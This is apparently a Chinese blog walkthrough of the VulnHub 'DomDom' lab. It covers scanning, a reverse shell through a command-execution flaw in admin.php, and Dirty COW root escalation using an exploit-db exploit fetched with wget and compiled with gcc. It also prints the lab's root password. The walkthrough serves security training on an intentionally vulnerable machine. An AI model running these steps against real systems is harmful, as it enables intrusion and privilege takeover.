首页 > 其他分享 >vulnhub靶场DomDom

vulnhub靶场DomDom

时间:2022-11-17 21:56:43浏览次数:54  
标签:https tar DomDom 提权 vulnhub exp 靶场 com

0x000 靶场描述


你对PHP程序的理解程度如何?您对 Linux 错误配置有多熟悉?此图像将涵盖高级 Web 攻击、开箱即用的思维和最新的安全漏洞。

此靶场没有flag,获取到root权限即可。。。


0x001 靶场下载


https://www.vulnhub.com/entry/domdom-1,328/


0x002 信息收集


探测存活主机

netdiscover -r 192.168.1.0/24

探测存活主机

端口扫描

nmap -sS -sV -A -p 1-65535 192.168.1.106

端口扫描

目录扫描

dirsearch -u http://192.168.1.106/

目录扫描


0x003 命令执行漏洞


访问网站

index.php

admin.php

使用burpsuite抓包测试,发现admin.php存在命令执行漏洞;因此可以执行一个反弹shell从而getshell

index.php

admin.php

https://www.revshells.com/ 网站生成反弹shell

php_shell

成功获取到shell

shell

切换交互模式:python3 -c 'import pty;pty.spawn("/bin/bash")'


0x004 提权


脏牛提权

uname -a 查看当前系统版本为 Linux ubuntu 4.4.0-21-generic

可以下载漏洞检测脚本进行检测 https://github.com/mzet-/linux-exploit-suggester

检测到CVE-2016-5195,典型的脏牛提权漏洞

CVE-2016-5195

下载利用exp:wget https://www.exploit-db.com/download/40616

mv 40616 exp.c
gcc exp.c -o exp -pthread
chmod +x exp

这里编译的时候可能会报错,不用管

root

root密码登陆提权

查找特殊权限的文件:getcap -r / 2>/dev/null

getcap

打包用户 domom 目录

tar -cvf domom.tar /home/domom
tar -xvf domom.tar
cat README.md

找到了root密码:Mj7AGmPR-m&Vf>Ry{}LJRBS5nc+*V.#a

root

标签:https,tar,DomDom,提权,vulnhub,exp,靶场,com
From: https://www.cnblogs.com/Cx330Lm/p/16901114.html

相关文章

  • vulnhub靶场CyNix
    0x000靶场描述级别:中级描述:这是一台Boot2Root机器。该机器与VirtualBox兼容,DHCP将自动分配一个IP。您必须查找并读取两个flag(user和root),它们分别存在于user.txt和......
  • vulnhub靶场Os-hackNos-2
    0x000靶场描述难度:简单到中级flag:2个flag第一个用户和第二个根学习:Web应用程序|枚举|密码破解0x001靶场下载https://www.vulnhub.com/entry/hacknos-os-hac......
  • vulnhub靶场Os-hackNos-3
    0x000靶场描述难度:中级flag:2个flag第一个用户和第二个root学习:Web应用程序|枚举|权限提升网站:www.hacknos.com联系我们:@rahul_gehlaut0x001靶场下载https......
  • vulnhub靶场之DEATHNOTE: 1
    准备:攻击机:虚拟机kali、本机win10。靶机:DEATHNOTE:1,网段地址我这里设置的桥接,所以与本机电脑在同一网段,下载地址:https://download.vulnhub.com/deathnote/Deathnote.ova......
  • Vulnhub Crossroads靶机解题详细过程
    Crossroads识别目标主机IP地址......
  • Vulnhub ColddboxEasy 靶机解题详细过程
    Colddbox识别目标主机IP地址──(kali㉿kali)-[~/Vulnhub/Colddbox]└─$sudonetdiscover-iethCurrentlyscanning:172.16.52.0/16|ScreenView:UniqueHo......
  • vulnhub靶场之VIKINGS: 1
    准备:攻击机:虚拟机kali、本机win10。靶机:DRIPPINGBLUES:1,网段地址我这里设置的桥接,所以与本机电脑在同一网段,下载地址:https://download.vulnhub.com/vikings/Vikings.ov......
  • Vulnhub Chili靶机详细解题过程
    Chili识别目标主机IP地址本靶机存在无法从Virtualbox自动获得IP地址的问题,根据本人另文来解决该问题。──(kali㉿kali)-[~/Vulnhub/Chili]└─$sudonetdiscover-i......
  • Vulnhub Cherry靶机解题详细过程
    Cherry识别目标主机IP地址靶机存在无法从Virtualbox自动获取IP地址的问题,先参照本人另文解决该问题。┌──(kali㉿kali)-[~/Vulnhub/Cherry]└─$sudonetdiscover-......
  • sqlilabs靶场心得-联合注入
    第一次接触sql,也是第一次接触web,在学长的指导下借助sqllabs靶场来对sql注入进行学习。不知不觉二十多天过去了,学长给的靶场任务也完成了。现在写一些东西来记录一下。首......